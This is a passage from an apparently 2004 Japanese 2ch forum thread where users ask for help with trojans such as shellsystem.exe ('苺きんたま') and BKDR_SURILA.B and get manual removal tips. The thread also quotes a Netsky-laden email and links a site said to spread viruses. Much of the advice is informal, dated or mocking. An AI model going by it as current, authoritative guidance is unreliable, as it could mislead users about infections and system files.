電源入れなおしたら、削除できました。 その後、インターネットオプションで
クッキーやらファイルの削除も全部したけれども、 遅いままなのです。
エクスプローラで「exe」を検索して確答したものがあったんで、
一つ消したけど、遅いまま。「prefetch」とか書かれてたような。
もう削除してよく覚えてないけど。 根源は絶ったのですが、
それに付随するファイル等がどれなのか分かりません。
それらのファイルが処理を遅くしているはずなのですが、
その探し方が分かりません。 _| ̄|○
誰か元に戻すやり方を知りませんか?
ちなみにOSはXPです。
>>506 それデスクトップ画像とかうpロダに晒されてるみたいだよ
キンタマだね。どっかに皿仕上げスレあるから。
ちなみに削除の仕方はシラネ
セーフモードでもやってみれば?
>>506 遅い=CPU使ってる
遅い=HD読んでる
どっち?
>>506 すいません。ageてしまいました。
処理の遅さについてですが、ブラウザ、
ワード、エクセルなど、立ち上げる際の
速度が異常に遅くなりました。
警告マークで「shellsystem リストのインデックスが
範囲を超えています(0)」としばしば表示されます。
>509 タスクマネージャーは?
>>508 さん
すいません、どういう意味でしょうか?
その時はlive2chを使っていて、スレから直接ダウンロードしました。
自業自得なんですが、ファイルの安全を確認する前に
解凍してしまいました(デスクトップに表示された)。
>>509 いやHDずっと読んでいるかとか
Crtl+Alt+Deleteキーでタスクマネージャー出して
パフォーマンスでCPUの100%?
100%ならプロセスでCPU食ってるプロセス探してみ
>505
こんなのみっけた
57 :51 :04/06/23 00:13 ID:???
>>54 その通りでした・・・_| ̄|○
PandaのインターネットセキュリティをDLしていたら
Win32:Kuang2っていうやつとWin95:Matyas
というのも一緒にもらっていました。アンチウィルス
ソフトをDLして、ウィルスも一緒につけてくれるとは
なんて親切な企業なんだ。感動した!!
>>512 タスクマネージャーの存在自体知りませんでした。
今見たら、CPUが100%になっていました。
プロセスを見たんですが、どれを削っていいのか
分かりません。shellsystem.exeやOmgtray.exe.や
QCONSVC.EXEやsvchost.exeなどまったく身に覚えのないやつは
削除しても何の悪影響はでませんか?
515 :
名無しさん@お腹いっぱい。 :04/09/24 03:34:01
RegCleaner(レジストリを整理するソフト)を使って、 特定のレジストリを消去しようとすると、物理、仮想メモリ、共に満タンになってしまいます。 これはウイルスなのでしょうか?アンチウイルスソフトで引っかかりませんでしたし、 WindowsUpdateも先日済ませたばかりです。 それと、この件に関係するとは思うのですが、MP3エンコーダーの処理速度が落ちましたし、 MP3タグ管理ソフトで、一括でタグ情報を変更しようとすると、これまた前よりも時間が掛かるようになりました。 一体何が原因なのでしょうか?
>>514 その中で特にCPU食ってるプロセスはどれ?
イメージ名|ユーザー名|CPU|
って描いてるところのCPUをクリックするとソートされるから
svchost関連のウイルスは有るけどそれに感染してる事は無いかもしれないし 消す必要が無い、消してもPCが動かなくなる事は無いがネットするのにに何らかの支障が出る
≫517 パソコンが動かなくなりました 携帯から書き込んでます たすけてください
( ´,_ゝ`)
>>516 さん
どのexeファイルが危険なのか、どうやって判断するのでしょうか?
どこかサイトを参照してますか?他にも
SPTISRV.exe、shellsystem、Omgtray、WinCinemaMgr
svchost、QCONSVC、ctfmon、mdn、avgserv、LEXPPS
spoolsv、avgcc32、rnathchk、qttask、ibmpmsvc
Isass、services、winlogon、csrss、smss、tp4serv
igfxtray、LTSMMSG、alg、hkcmd、realsched
不明なファイルがずらりと。どれ削っていいのでしょう?
すいません、何も分からなくて。
>>518 さん
容量多い順に並べると、
iexplore.exe(24,298K)>live2ch(24,780)>svchost(22,624)
>explore(21,376)>Omgtray(11,836)>shellsystem(7,356)
>csrss(7,208)>以下略
こんな感じです。
526 :
505 :04/09/24 03:57:17
うほっ >513さんサンクス 俺も感動したよ、ほかのPandaでスキャンした人はどうしてるんですか?
>>524 CPU使ってるパーセンテージの事で容量ではないよ
CPUが常時100%ならどれかのプロセスが異常にCPU使ってるから
まずそれを見つけること
把握できないぐらいプロセス多くて迷うならOS再インスコした方がいいよ これからアプリを一つインスコする度にタスク(増えたプロセス)確認してチェックしとけばいい 不具合あったときにほぼ即解決できるし
ソートしろよ
shellsystemを消したら、速度が戻ったんですが、 再起動したら、復活してました。_| ̄|○ タスクマネージャーからまた削除しようとしたのですが、 今度は削除できなくなりました。 OSインストールしなおしたら、いらないもの全部消えますか?
>531 hai
>>528 さん
CPU食ってるのは、shellsysytemとかいうやつでです。
2つあるんですが、2つあわせて100近くになってます。
osはユニクスですか・・・?
XPの「システムの復元」をやってみたんですが、 未完了と出て、失敗しました。 どうやったら、shellsystemを消すことが出来るでしょうか?
>>460 と同じウィルスにかかりました。BKDR_SURILA.Bってやつです
トレンドマイクロのオンラインスキャンで、感染ファイルを3箇所発見したんですが
どこのデータベースにも載っておらず、駆除方法がよくわかりません。
感染していたファイル名でググったら、
Win-Trojan/MyDoom.234496っていうワームの解説が見つかって、そこにあった
Windows システムフォルダ SVKP.sys (2,368 バイト)
というのが一致したのですが、これも該当するデータベースがほとんどありませんでした…
紹介されていたページのセキュリティソフトを購入すれば大丈夫なのでしょうけども(2社しかありませんでしたが…)、
手動駆除はできるんでしょうか?
すみません、検索したはずだったのに
>>482 を見落としてました…
手動だけでは難しいみたいですね、失礼しました。
やっとshellsystem消えてくれました。 手動で消したんですが、今回は復活しませんでした。 また復活しそうで怖い。 でも、まだよく分からないexeファイルがいっぱいあるので、 CD見つかり次第、OSを再インスト−ルし直します。 とりあえず機能が戻ったんで、ちょっと嬉しいです。 助言くれた方に再度感謝します。
541 :
やちゃた :04/09/24 07:28:39
482のBKDR_SURILA.Bの持ち主です。みなさん、いろいろ情報
ありがとうございます。
>>460 さん
見落として同じ事を聞いていました。すみません。
>>483 さん
仕事でPC使うので死活問題。気にします。
>>484 さん
いえ、そりゃ全部直したいですよ。でも方法はどこ壊れたか、
ここで聞けないから、まずウイルスのこと教えてくださいと
しました。
>>485 さん
そうですね。それがベストだった気がします。あと1週間も
すればウイルスバスターも動いてくれるかな?
>>487 さん
ありがとうございます。今もてる最高の情報でした。しか
しホストファイルは探し出せませんでした。オンラインはO
UTLOOK使ってくれということで最後までしてません。
>>その他の私と同じウイルスの持ち主さん、
忍耐?で、がんばりましょうね。
取りあえず、BKDR_SURILA.B は最新パターンで取り扱ってい
るのも外国の数社で、対抗策は見えず、わかりやすい日本版を
待つのがベターかと判断しました。
私は自分の壊してしまったところを修復していくのを優先す
ることにします。
【使用OS、WindowsUpdateの有無】Win2k,月に一回程度 【使用AntiVirus、Updateの有無】AVG,Norton体験版 【スキャンした結果(ウイルス名・発見場所)】なし 【症状】ネットワークが全く機能しない。同じネットワークのマシンすら見えない。 Z*******.tmpという実に怪しいファイルがtempフォルダに毎回起動時に生成される。*は毎回異なる。 【これまでにとった措置】spybot,ad-aware,AVG,Norton(Nortonは怪しいと思った瞬間にインスコしました)によるチェック済み。 おそらくなんかのトロイを食らっているような気がするのですが、 スキャンしても何も出てこないのが・・。 同じLANのなかの別のマシンからはこうして2chにも接続できるので、単なるLANの不良ではなさぽ。 ちなみに怪しい.tmpのファイルは「使用中の可能性が〜」とのことで削除もウイルスチェックもさせてもらえません。 どうかお知恵をお貸しください。
ちなみに、ZoneAlarmのログを見ると、なんだかえらい頻度で通信をブロックしているようです。 今はネットワークそのものを無効にしているので何もありませんが・・。
【使用OS、WindowsUpdateの有無】Win2k,月に一回程度 Windows2000なら、自動的に「重要な更新」をダウンロードしてインストールする設定にできるはず WindowsUpdateはくまなくやって、その設定をしておけ。月に1回じゃ少なすぎ
苺キンタマに引っかかった奴って炉愛好者なんでしょ?
>>542 ZA入れてからちゃんとできてた?
ZAが邪魔しているということはありえませんか?
そうすれば頻繁に通信をブロックしているということも説明できる。
んでそのファイルがブロックのログということは?
すいません、メールを送ってないのにノートンにメールが送れませんでしたと出てくるのですが・・・ アドレスはいつも一緒の所に送られているようで・・・
>>541 VB2004で隔離した(検出した)ファイルはsvkp.sys以外にも
あるんでないの?
(たとえば、dx32cxlp.exe/dx32cxel.sys/dx32cxconf.ini)
SURILA.Bは別ワームMydoom.ほげほげがダウンするものらしい
そしてMydoom.ほげほげは亜種がたくさんあって、チミの情報
だけじゃ絞り込めぬ。
(pandaにもその旨書いてあるんだが本当に対応しきれてるのか
が疑問に思えてきた)
上の情報があれば絞り込みができるかもしれない。
(回答できるとしても早くて夜以降になるけど)
隔離してるからほおっておいても実害はないと思うけど気になるなら
書いてみるとよろし。
ちなみにhostsファイル(hostはtypo)は
95/98/ME: C:\Windows\System フォルダ
NT/2000: C:\WinNT\System32\Drivers\ETC フォルダ,
XP: C:\Windows\System32\Drivers\ETC フォルダ
でメモ帳なんかで確認できる
でふぉではエントリとしてコメント行(#で始まる)以外に
127.0.0.1 localhost
がある
このファイルだけなおしても意味ないけどね
手動削除手順は以下のような感じになると思う(スペイン語)
ttp://www.softdownload.org/fichas/masbuscados/virusreport/guias_de_seguridad/trojsurila.naa.2._3166.asp
Return-Path: <
[email protected] >
Received:from ttb2-ip008.user.xsp.fenics.jp (EHLO yahoo.co.jp) (219.97.237.8)
by **
From:
[email protected] To: **
Subject: Thank you!
Date: **
MIME-Version:1.0 Content-Type:multipart/mixed;
X-Priority:3 X-MSMail-Priority:Normal
Your bill is attached to this mail.
ファイル名: bill.zip
ファイルの種類: application/octet-stream
スキャン結果: W32.Netsky.P@mmというウイルスが見つかりました。
542です。出先からなので今すぐというわけにいきませんが、
自宅に帰ったら試してみたいと思います。よろしくお願いいたします。
結果は後ほど報告させていただきます。
>>544 氏
もともとは併用ではなかったのです。
少しずつパフォーマンスが低下しているネットワークに異変を感じて
シマンテックのオンラインスキャンを試していたら、そのうちにネットワークが完全に死亡。
AVGでスキャンしても異常なし。
シマンテックのスキャンの途中経過に感染ファイルがいくつかピックアップされていたので
これではいけない、と別マシンで体験版をDLし、死亡機にインスコ。
感染ファイル発見→削除→直んねぇ・・・。
という経緯だったのです。
重要な更新はDLしてインスコする設定になっていました。
そのほかに月に一回、ということです。
書き方が悪かったですね、もうしわけありません。
セーフモードでのスキャン、アンチトロイ、試してみます。ありがとうございます。
>>547 氏
ZAは以前より導入していましたし、試しにZAを終了させても事態が変わらなかったので
おそらくZAは原因ではないと思います。
ただ、一分おきにincomingに対してブロックしているという状況は
いささか異常なのではないかと思って書き添えました。
ファイルは(出先なので記憶があいまいですが)256バイトだったように思います。ログにしては小さいです。
ともあれ、ありがとうございます。
554 :
名無しさん@お腹いっぱい。 :04/09/24 16:43:21
質問します。 w2kで、あるソフトを起動、うまく動かないので、再起動。 英語のメッセージが出てエラー。 ファイルだけでも救出しようと、もう1台のパソコンにその起動HDDを接続し 起動させると、そのパソコンの「ページファイルがありません・・・」で動かず そのHDをはずしても、そのパソコンまでまともに動かない。 接続、データードライブとして起動しただけで、感染するウイルスってあるのですか? また、その対策は!?(他人のパソコンまでまきぞいにしてしまい、悲しいです・・・) m(_ _)m
555 :
名無しさん@お腹いっぱい。 :04/09/24 16:46:58
WindowsMeを使っています。 急に再起動を繰り返し困っています ウイルスだと思うのですが何かわかりません。 駆除方法はないのでしょうか? どなたか助けて下さい・・・
>>555 >WindowsMeを使っています。
捨てろ。
>急に再起動を繰り返し困っています
へぇ〜
>ウイルスだと思うのですが何かわかりません。
アンチウィルスソフト使えよ。
>駆除方法はないのでしょうか?
何を駆除するんだよ。
>どなたか助けて下さい・・・
そりゃ無理だって。
エスパーさん出番ですよ!
ウイルス駆除ソフトは入れていました。 大切なものが入っているので再インスト−ルはどうしても避けたいです・・・ もうどうしたら良いのかわかりません
今となっては遅いのですが バックアップとっていませんでした
>>553 元々併用じゃなかろうが、今の時点で併用してちゃダメなの。
どうしてもノートンでスキャンしたいなら、オンラインスキャン使え。
>>554-555 どんなメッセージが出るのかもわからないし、もしかしてBIOSがぶっ壊れたんじゃねーのか?
ウィルス駆除ソフトは何いれてたかもわからないし、リカバリしろとしか言いようが無い
もっときちんと症状を書け
方法1 デスクトップ型等ハードディスクが二台つけれるPCの場合
感染したHDDを取り外す
もう一台HDDを買って取り付けシステム再インストール&アンチウィルスソフト導入
感染したHDDをスレーブとして取り付ける
ウィルス駆除
方法2 ノートPC等のハードディスクが二台つけれないがLANが使えるPCで
なおかつもう一台LANが使えるPCがある場合
FD-Sambaを入れたフロッピーディスクを作る(作り方はFD-SambaでGoogle)
感染したPCをFD-Sambaを入れたフロッピーディスクで起動
感染したPCもう一台のPCとLANで接続
大切なデータをコピー
方法3 CD起動が出来るPCである
ttp://www.jtc-i.co.jp/avast/avast10-bart.htm avast! BARD CD(アバスト バートCD 七万二千円)を購入してウィルスを駆除する
ttp://www.jtc-i.co.jp/avast/avast00-top.htm
560さんへ ありがとうございます。 初心者なので何がなんなのかわかりません。すみません。 わかったら報告します。 561さんへ ありがとうございます。試してみます!!
ユーザー名の完全な変更の仕方教えてください WINXPです
画面に全体に急に血飛沫が出てきたんですけど、これってウイルス?
>>565 ジョークソフトで似たようなのがあったな
スタートアップとかに変なexeないか?
>>566 確かにジョークソフトでもあるんだが、キンタマの症状でもあるんだよなぁ・・・。
「致死武器」
>>563 「XP ユーザー名 変更」でググれ。苺?
>>482 俺も最新アップデート後、全検索したらSVKP.sysにBKDR_SURILA.Bが検出された。
しかし、不自然なのは検出ファイルがSVKP.sysしかないことだ。
SVKP.sysをコピーする他のウイルスの解説を読んでも、SVKP.sys自体はAntiCrackingが
提供するSVK Protectorの正規コンポーネントで、害の無いプログラムも利用しているとあり
ファイルサイズも同じだった。
また居昇殿起動時にリアルタイム検索に反応すること、SVKP.sysの更新日時は居昇殿を
インストールしたときと重なることから、居昇殿がソフトウェア保護のためにSVKPサービス
を利用しているだけで、今回は誤検出であると俺は予想というか期待している。
一応TrendMicroにウイルス検体としてSVKP.sysを送り返事を待っているところだ。
1営業日経過したが返事はこない。返事は来週になりそうだ。
>>541 直したいなら始めからそう言えばいいのに。
2kの場合「システム修復プロセス」でレジストリの修復ができるらしい。
詳しい方法は、ググればわかるよ。
正しくは巨商伝か。どーりでみつからん訳だ。
自分は巨匠伝も、TWもまったく触れてないのにSURILA.Bに感染してました・・・ なにをしているトロイなのか分からずとても不安なので、解説出るまで回線つなげない事にします。 来週には駆除できるといいなぁ
shellsystem.exe発見したんですが削除できません 教えてくれませんか?
>>573 [対処法]
(1)マイコンピュータを開き、Cドライブ→WINDOWSフォルダを開く
(2)検索ボタンを押してファイルとフォルダすべてからshellsystem.exeを検索
(3)検索結果に引っかかったならば削除
(4)スタートメニューの[ファイル名を指定して実行]を選びregeditと入力
(5)HKEY_USERS → .Default → Software → Microsoft
→ Windows → CurrentVersion → Run
と選んでいく
(6)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除
(7)HKEY_CURRENT_USER → Software → Microsoft
→ Windows → CurrentVersion → Run
と選んでいく
(8)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除
[情報]
追加されるファイル:
windows\shellsystem.exe 678kB
追加されるレジストリ:
HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
すいません セーフモードってどうやってやるんですか? 全然わからないのです
XPです
わかりました やってみます 再起動のときずっと連打してればいいんですか?
ありがとうございました もしできなければよろしくお願いします;
ほんっとごめんなさいなんですけど (6)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除 はrunの中にあるのでしょうか それがないんですけど・・・
>>581 おかげさまで消せる事ができました!
ありがとうございました!
>>584 あぁ、Runにあったんだ。まずは良かった。
とりあえずID出ない板では名前に番号でも入れて誰だか区別できるようにしようね
苺の元種ってどっかで手に入らないかなぁ
>>574 さん
(5)のやり方で、「Run」の中に「ctfmon.exe(REG_SZ)」がありました。
これは削除すべきですか?
(7)の「Windows」の中に「Shell」と「ShellNoroam」があるのですが、
これはshellsystemと関連があるのでしょうか?削除すべきですか?
また、(7)の「current version」の中に「Shell Extensions」があるのですが、
これもshellsystemと関連があるのでしょうか?削除すべきですか?
ちなみに、(5)(7)の「Run」の中には「shellsystem.exe」のファイルはありません。
タスクマネージャーの中でそのファイルが機能していないので、
問題はないかと思いますが、少し不安です。
>>588 ですが、ちょい訂正。
shellsystem.exeを削除したので、
タスクマネージャーの中にはなく、処理速度は通常に戻っています。
なので、問題はないかと思いますが、少し不安です。
ちなみに、「HijackThis」で「shellsystem」の部分は削除しました。
質問しまくりだな 少しは自分で調べようとする気はないのか? てゆうか、おまい誰よ?
>>589 今クグってきました。どうやらどれも問題ないようです。
すんません、勝ってに騒いで迷惑かけて。
592 :
やちゃた :04/09/25 06:35:37
LiveUpdateでUpchan来てる? そろそろ来ないと被害者数が凄いことになりそうなんだが
すいませんSURILA.B関連の話なのですが、、、
このスレッドを読んで、SURILAを駆除しようとpandaのオンラインスキャンをしたんです。
それから
>>505 、
>>513 を読んで驚いてしましました。
この話は本当で、だとしたらpandaからもらったウイルスはどう駆除できるのでしょうか?
トレンドマイクロオンラインスキャンをしてみたら検出はされなかったのですが。
ちょっと質問よいだろうか紳士諸兄。 最近巷で噂の苺きんたま。 気になったので一応自分のPCも調べてみて 全ファイル検索とタスクマネージャでは sugoimonoss.comもshellsystem.exeもみつからなかったのだが レジストリエディエタを検索してみたら search Assistantというところに 種類 REG_SZ データ shellsystem.exeというのが出てきたので… これは一体…? あと、念のためこのトロイが潜むのはc:\windows直下ということで間違ってない?
>>597 OS再インストすれば、消えるよ(*^ー゚)b
500 名前:名無しさん@お腹いっぱい。[sage] 投稿日:04/09/25(土) 21:41:05 ID:HKA4Ue+e C:\WINDOWS\〜でファイルの参照したら $NtUninstallKB821557$ $NtUninstallQ810565$ $NtUninstallKB839643-DirectX9$ こんなのが青字でいっぱい出てきたんだけど何? (((( ;゚Д゚)))ガクガクブルブル つー質問があって、レスにそれウイルスの残すファイルだ〜ってあったんだが 本当? $NtUninstallKB839643-DirectX9$があってさ、でもこれDirectX9入れたせいだと思うんだが・・ それにWindows Update 後にできるフォルダじゃなかったっけ? もしかして俺釣られた?
>600 うん 500の質問に自信満々にレスしてたから 500に大丈夫と言っていいのか 俺の記憶違い(Windows Update 後にできるフォルダ)だったのか不安になっちゃってさ で、質問板で聞けって500の人も言われてたから、一応「質問」で出たすれを検索してみたけど 聞いてないみたいだったんで被ってないと思って聞いてみた次第です マルチみたいになって申し訳ないっす
再インストって再セットアップとは違う?
604 :
名無しさん@お腹いっぱい。 :04/09/26 11:43:59
俺も質問! PC立ち上げてネットにつなぐと 「表示出来ない・・・」 つーのが延々と出てくる・・・・ なんだこりゃ??
606 :
名無しさん@お腹いっぱい。 :04/09/26 13:48:28
「マイドキュメント」が 「マイドキュソメント」に いつの間にか書き換えられてました・・・ そんなウイルスってございます?
>>606 考えられるのは、ぬるぽだとか2chねらーのウィルスだな
どうせWinnyやってたか、アプロダから変なもんDLしたんだろ
ご愁傷様、バカな自分を恨んでください
608 :
名無しさん@お腹いっぱい。 :04/09/26 14:23:18
掲示板に故意にウイルスへのリンクを貼り付けたら犯罪になりませんか?
609 :
名無しさん@お腹いっぱい。 :04/09/26 14:34:44
ウィルス:BKDR_SURILAB 感染ファイル:C\WINDOWS\system32\SVKP.sys と、トレンドマイクロのオンラインスキャンがおっしゃってるのですが データベースにありません…感染ファイル消そうかと思ったけど、なんかヤバげなファイルだし、どうしましょう
611 :
名無しさん@お腹いっぱい。 :04/09/26 14:51:09
ウイルスに感染したらタスクに表示されますよね?
612 :
名無しさん@お腹いっぱい。 :04/09/26 15:00:21
ノートンでチェックしたら4つほど修復できないファイルが見つかり 検疫はできたのですが、この検疫ってのをした状態で放っておいて大丈夫ですか? ウイルス名は ・BloodhoundExploit.6 (←×2) ・Trojanhorse (←×2)
>>611 タスクに表示されないものもあるよ
>>612 シマンテックのウィルスデータベース見て、手動駆除しなさい
614 :
名無しさん@お腹いっぱい。 :04/09/26 15:19:34
苺きんたまウィルスにかかったようです まとめサイトを参考にファイルを削除したのですが 削除したとたんフリーズしてしまいます 再起動するとパソコンのデータが消えてしまいます どのアイコンをクリックしても動きません 再起動、終了を10回ほど繰り返すと元に戻ります で、検索すると削除したはずのshellsystem.exeがまたあります どうすればいいですか?
>>614 やましいファイルを落としたあなたがバカなだけです
ネット接続を切断して、セーフモードで除去してみろ
どうせレジストリも残ってるんだろうから、ちゃんと見て駆除しなさい
>>615 難しすぎて何をいってるのかわかりません
あぼーん
>617 つーかさ615に書いてるのって初心者向け雑誌にすら書いてる様な事だぞ ネット接続を切断、セーフモード、レジストリ きつい様だがこれぐらいは最低限必要な知識と思う セーフモードの入り方は買ったPCの説明書にも書いてるだろうからそれ参考に 再インストールするなら説明書みるなり、ネットで検索かけるなりで
すいません、質問させてください。 症状ですが、家に帰ってきてパソコンを立ち上げたら画面が青くなってました。 一応ノートンとアドウェアでチェックしスパイウェアは削除したのですが・・・ 直らないので改善方法を教えていただけると助かります。
>>621 「青くなってました」じゃ、ブルースクリーンなのかスパイウェアなのかもわからない
それじゃ回答しようがない
>>621 トマトが赤くなると医者が青くなると昔からいわれています。
う、すいません。 えっと、全体的に青みがかっている感じです。 文字を見たり書いたりすることは可能な状態です。
ん? モニターがいかれたって可能性は?
モニター自体のメニューを開くと普通に表示されるので、モニターは正常だと思うのですが・・・
>>626 ブラウン管?
画面が焼きついたとかw
液晶ならありえないけど
えっと、解決しました。 原因はディスプレイにあったみたいで、 物置においてあったディスプレイにつないだらくっきり・・・・ こんなへたれの質問に答えて頂きありがとうございました。
632 :
85 :04/09/26 16:53:14
質問者は
>>85 or
>>86 の質問テンプレ使うと
回答者もわかりやすく、回答もつきやすい・・・かも。
では、次の方ドゾー↓
an apple a day keeps doctor away
>>614 です
セーフモードで削除してみましたが
再起動したらまた復活してました
どうすればいいですか?
>>574 の方法も全部しましたけど再起動したら復活してました
どうすればいいですか?
>>635 もしかして、OH〜〜〜YES!!は Me ですか?
>>635 あんたじゃ無理 悲しいけど、フォーマットする
Bloodhound.Exploit.13 ファイルを分析しました。 送られたそれぞれのファイルについてわかったことを以下に報告します。 ファイル名: CRASH-TEST.RenameToJPG 結果: デベロッパーノートを参照してください。 ファイル名: poc_poc.jpg 結果: デベロッパーノートを参照してください。 デベロッパーノート : CRASH-TEST.RenameToJPG This is a proof-of-concept program that does not contain any malicious payload. You can delete it safely. Poc_poc.jpg This is a proof-of-concept program that does not contain any malicious payload. You can delete it safely. このファイルにウィルスがいると判断しましたが、特に問題はありません。 詳しくはデベロッパーノートをご覧ください。 (C)2004 シマンテック・セキュリティ・レスポンス (P)2004 シマンテック・セキュリティ・レスポンス
643 :
名無しさん@お腹いっぱい。 :04/09/26 21:57:51
すみません、ルータに感染するウイルスはあるのでしょうか? また、一つのルータで、一本のLANケーブルを二つのパソコンに交互に 繋いだ時、片方のパソコンがウイルスに感染していた場合、それに さしていたLANケーブルをぬき、別のパソコンに繋いだ時、 そのパソコンも感染してしまうのでしょうか? どうかよろしくお願いします。
質問です。 3年前に買ったVAIOなんですが前に入れておいたウィルス対策ソフトの 期限が切れたので早速買ってきた対策ソフト(SOURCENEXTウィルスセキュリティ2005) を入れてみたんですが、ソフトの指示に従い再起動後、CDドライブが認識されなくなってしまい、 インターネットにも接続できない状態です。しかも入れたはずの対策ソフトが見当たりません。 今はサブPCから書き込みしています。何かアドバイスを頂けないでしょうか・・・
>>644 うは、ご愁傷様でした
そっちのスレ見ればわかるけど、不具合満載ソフトだよ
フリーソフトの方がまだマシだという糞フト
授業料だと思って諦めるといいと思うよ
>>646 人を誘導しといて言うのもなんだが、テンプレ段階でワロテしもた。
なんか、今後目が離せないスレになったよw
648 :
迷惑だった :04/09/26 22:39:49
此処も ウィルス 落としています 逮捕してください homepage3.nifty.com/shiofuki/
>>648 逮捕はK察のお仕事。迷惑したならniftyに文句を言ってくらはい。
>>645 >>646 レスthxです。
ウィルスセキュリティ2005を入れる前にもPCがいきなり再起動したりすることがあったのでウィルスの可能性もあるかと思いここに書き込んでみたんですが・・・
ちなみに今はセーフモードでしか動かせないです。
こんな症状のウィルスって無いんですかね・・・
651 :
名無しさん@お腹いっぱい。 :04/09/26 23:33:02
苺きんたまの事で、お願いします よくわからない物がレジストリに表示されるんです。 感染しているかどうか不明だったので、Cドライブにshellsystem.exeがないか 検索しましたが、ありませんでした。それからregeditを開いて HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run を見ましたが、こちらにもありませんでした。ですが、 regeditで更にshellsystemを検索したところ、 shellsystemとshellsystem.exeがありました。 001"shellsystem"みたいな感じで…(この番号ははっきり覚えてません)。 セーフモードで起動してregeditでshellsystemを検索すると やはり 000"shellsystem"と出ます。 下のステータスバーのところには、 マイコンピュータ\HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\ Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU とあります。普通に起動していた時も、検索結果でExplorer Bars…というのが見えました。 このregeditでの検索結果のshellsystemとshellsystem.exeが 何度削除しても復活しているんです。 該当ファイルはなかったんですが、やっぱり感染してたんでしょうか。 それと、どうすれば消えるんでしょうか… 長くてすみません。
>>651 >このregeditでの検索結果のshellsystemとshellsystem.exeが
>何度削除しても復活しているんです。
レジストリの値を消したって意味?
000にshellsystem、001にshellsystem.exeとあったので 000と001を右クリックして、そのまま削除を選んだのですが… 今再起動してみたら、この二つは消えていました。 というより、000と001が消えていました。 これってもしかしてまずいんでしょうか?
>>654 ば〜〜〜〜〜〜〜か
URL貼ってんじゃネ〜ヨ
657 :
名無しさん@お腹いっぱい。 :04/09/27 00:31:49
virus bulletinみたいな評価サイトで 最近の評価が載ってるサイトありませんか
>652 ありがとう。安心して眠れそうです。 レスを頂くまで自力で調べてみてました。 〜Explorer Barsにあったshellsystemは、自分のOSの中身を検索したから それが出てきた…という事なのでしょうか。感染もしていなかったみたいで、ほっとしました。
>>655 スマンかった。
>>656 いや、普段こういうとこは見てない。直リンではまった。(バカ
でもAd-awareでスキャンしといた。サンクス。
つか、
>>651 をよく見ればただの検索履歴ではないか
664 :
名無しさん@お腹いっぱい。 :04/09/27 00:59:20
一度検出されたウィルス(トロイ)が検出されなくなったら 駆除されたと考えていいんですかね? 今日トロイ付きのリンクを踏んでしまいました。 そのあとシマンテックのオンラインスキャンを実行した結果トロイが検出されました。 その後自分のパソコンにインストールされているノートン(定義は半年前に期限切れ)で スキャンし、感染:1、駆除済み:1と出ました。 その後もう一度シマンテックでオンラインスキャンしたんですが何も検出されませんでした。 念のためウィルスバスターも試しましたが何も検出されませんでした。 これは大丈夫なのでしょうか?お願いします。
教えてください。 見事に苺きんたまにかかってしまったのですが、winnyをもっていなければ デスクトップ画像がアップされないのでしょうか?
>>666 ありがとうございます。
やたらと、shellsystem error というのが出てくるので
何かと思って検索したら苺きんたまでした。
このエラーが、つまり、winnyをもってないために
アップできなかったというエラーだったんでしょうか?
>>665 コレに関しては、nyは全然関係ないで〜す。
トロイ自体がうp&スレ爆撃しまーす。
>>666 こらこら、この悪魔w
>>664 シマンテック&トレンドマイクロ以上の知識と技術を
持ってる個人はそうそういませんよ〜。
>>668 なにー!じゃあ、既にアップされたかもしれないのか・・・。
どこかで確認とかは出来ないんですよね?
>>662 サンクス。最初は Java SDK を誤認したのかとオモタ。
だめだ。うぷされてた。 本気で死にたい。
|・_・)....
記念
682 :
名無しさん@お腹いっぱい。 :04/09/27 01:42:12
寿司より早く
685 :
名無しさん@お腹いっぱい。 :04/09/27 01:42:21
>>665 どれどれ???おせーてー、ついでに
,-――――――-.
/ |
/ |
/ |
l"ジェンキン寿司 l
,、_lー-―――――‐--、/l
i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
ヾ,iハ゛.´ _,,、_ i.; _,. ` 彡'i)
`、j,' `゚''´:.ノ i::<・ゝ) .ハン へいらっしゃい!!
i, ` ,、/ i_ `` ,r'
,r〃'i ,r'ヽ、 _,〉 /.
/i:ト、;;i, ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、 ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i
687 :
名無しさん@お腹いっぱい。 :04/09/27 01:42:32
ノートンはLiveUpdateしても29日までだえめですのでご注意を 今のところ自動で対応できてるアンチウイルスソフトはありません
>>672 ,-――――――-.
/ |
/ |
/ |
l"ジェンキン 寿司 l
,、_lー-―――――‐--、/l
i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
ヾ,iハ゛.´ _,,、_ i.; _,. ` 彡'i)
`、j,' `゚''´:.ノ i::<・ゝ) .ハン へいらっしゃい!!
i, ` ,、/ i_ `` ,r'
,r〃'i ,r'ヽ、 _,〉 /.
/i:ト、;;i, ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、 ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i
689 :
名無しさん@お腹いっぱい。 :04/09/27 01:42:37
690 :
名無しさん@お腹いっぱい。 :04/09/27 01:42:37
寿司の出前がきますよ、
ジェンキン寿司 ここ違うw
692 :
名無しさん@お腹いっぱい。 :04/09/27 01:43:00
イイ事あるさw
693 :
名無しさん@お腹いっぱい。 :04/09/27 01:43:02
\ 、 m'''',ヾミ、、 / \、_,r Y Y ' 、 /';,'' 、 ,\ヽ, | | y /、 ,;;,,'', \、\::::::::::/, /,, ;;, ヽ\ o 、 ,o / { ;;;;;;;,, 丿 [ \|:::|/ ] >"''''' <ガリ >、.> U <,.< ノ ! ! -=- ノ! ト-、 ..''"L \\.".//_ | ゙` ]
